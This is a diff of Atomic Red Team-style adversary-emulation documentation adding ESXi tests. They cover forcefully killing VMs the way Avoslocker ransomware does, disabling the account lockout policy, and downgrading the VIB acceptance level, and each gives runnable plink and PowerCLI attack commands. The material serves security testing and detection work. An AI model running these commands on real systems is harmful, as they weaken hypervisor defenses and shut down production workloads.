+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 987c9b4d-a637-42db-b1cb-e9e242c3991b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| cli_script | Path to text with commands | path | PathToAtomicsFolder&#92;T1529&#92;src&#92;esx_pkill.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - ESXi - Avoslocker enumerates VMs and forcefully kills VMs
+Avoslocker malware has inbuilt functionality to enumerate the VM instances and uses the esxcli command to forcefully power off them.
+[Reference](https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 189f7d6e-9442-4160-9bc3-5e4104d93ece
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| cli_script | Path to text with commands | path | PathToAtomicsFolder&#92;T1529&#92;src&#92;esx_avoslocker_kill_vm.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.md

@@ -114,6 +114,8 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar
 
 - [Atomic Test #49 - Tamper with Windows Defender Registry - Powershell](#atomic-test-49---tamper-with-windows-defender-registry---powershell)
 
+- [Atomic Test #50 - ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50---esxi---disable-account-lockout-policy-via-powercli)
+
 
 <br/>
 
@@ -2106,4 +2108,55 @@ Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtectio
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #50 - ESXi - Disable Account Lockout Policy via PowerCLI
+An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 091a6290-cd29-41cb-81ea-b12f133c66cb
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
+Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
+Get-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false
+Disconnect-VIServer -Confirm:$false
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+if (-not $RequiredModule) {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name VMware.PowerCLI -Confirm:$false
+```
+
+
+
+
 <br/>

atomics/T1562.010/T1562.010.md

@@ -0,0 +1,118 @@
+# T1562.010 - Impair Defenses: Downgrade Attack
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/010)
+<blockquote>Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. 
+
+Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
+
+Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI](#atomic-test-1---esxi---change-vib-acceptance-level-to-communitysupported-via-powercli)
+
+- [Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI](#atomic-test-2---esxi---change-vib-acceptance-level-to-communitysupported-via-esxcli)
+
+
+<br/>
+
+## Atomic Test #1 - ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
+An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
+[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 062f92c9-28b1-4391-a5f8-9d8ca6852091
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
+Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
+(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = "CommunitySupported"})
+Disconnect-VIServer -Confirm:$false
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+if (-not $RequiredModule) {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name VMware.PowerCLI -Confirm:$false
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
+An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
+[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 14d55b96-b2f5-428d-8fed-49dc4d9dd616
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder&#92;T1562.010&#92;src&#92;esx_community_supported.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
+<br/>